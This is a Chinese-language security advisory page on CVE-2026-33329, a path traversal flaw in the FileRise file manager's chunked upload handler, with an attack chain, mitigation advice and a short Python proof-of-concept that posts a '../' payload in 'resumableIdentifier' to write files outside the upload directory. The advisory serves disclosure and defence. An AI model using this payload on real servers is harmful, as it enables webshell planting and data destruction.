IPBUF安全漏洞报告
English
CVE-2026-33329 CVSS 8.1 高危

CVE-2026-33329 FileRise 路径遍历漏洞致任意文件写入

披露日期: 2026-03-24

漏洞信息

漏洞编号
CVE-2026-33329
漏洞类型
路径遍历
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
FileRise

相关标签

路径遍历任意文件写入FileRiseCWE-22Web安全

漏洞概述

FileRise是一款自托管的Web文件管理器。在1.0.1至3.10.0之前的版本中,其Resumable.js分块上传处理程序存在安全漏洞。由于未对`resumableIdentifier`参数进行有效过滤,具有上传权限的认证攻击者可利用该漏洞将文件写入服务器任意目录,删除任意目录,并探测文件或目录的存在性,对系统安全构成严重威胁。

技术细节

该漏洞的核心在于`UploadModel::handleUpload()`方法中存在路径遍历缺陷。在处理Resumable.js协议的分块上传时,系统直接接收用户提供的`resumableIdentifier`参数,并将其与基础上传目录路径进行字符串拼接以生成最终的文件存储路径,期间完全缺失对路径分隔符(如`..`)的消毒处理。拥有上传权限的攻击者可以精心构造包含回溯序列的Payload。利用此漏洞,攻击者不仅能够绕过目录限制,在服务器的任意位置写入任意内容(如WebShell),还能利用上传完成后的自动清理机制删除系统关键目录,甚至通过文件操作返回的错误信息探测服务器的文件系统结构。

攻击链分析

STEP 1
步骤1:信息收集
识别目标服务器运行的是FileRise应用,且版本在受影响范围内。
STEP 2
步骤2:获取权限
注册或获取一个具有文件上传权限的低权限账户。
STEP 3
步骤3:构造恶意请求
构造包含路径遍历字符(如"../")的`resumableIdentifier`参数值,旨在突破上传目录限制。
STEP 4
步骤4:执行攻击
向`UploadModel::handleUpload()`接口发送特制的分块上传请求,触发漏洞。
STEP 5
步骤5:达成效果
成功在服务器任意路径写入文件、删除目录或探测文件存在性。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://target-filerise-instance/upload" session_cookie = "PHPSESSID=attacker_session_id" # Authenticated session # Malicious payload using path traversal in resumableIdentifier # This attempts to write a file to the root directory or a sensitive location payload = { "resumableChunkNumber": "1", "resumableTotalChunks": "1", "resumableIdentifier": "../../tmp/malicious_file.txt", # Path traversal payload "resumableFilename": "shell.php", "file": ("content.txt", "malicious content") } headers = { "Cookie": session_cookie } response = requests.post(target_url, files=payload, headers=headers) if response.status_code == 200: print("Exploit successful, file written outside intended directory.") else: print(f"Exploit failed, status code: {response.status_code}")

影响范围

FileRise >= 1.0.1, < 3.10.0

防御指南

临时缓解措施
建议立即升级至3.10.0版本。如无法立即升级,应限制Web服务器的文件系统写入权限,仅允许在特定隔离目录内写入,并实施严格的输入验证过滤机制,拦截包含路径遍历字符的请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表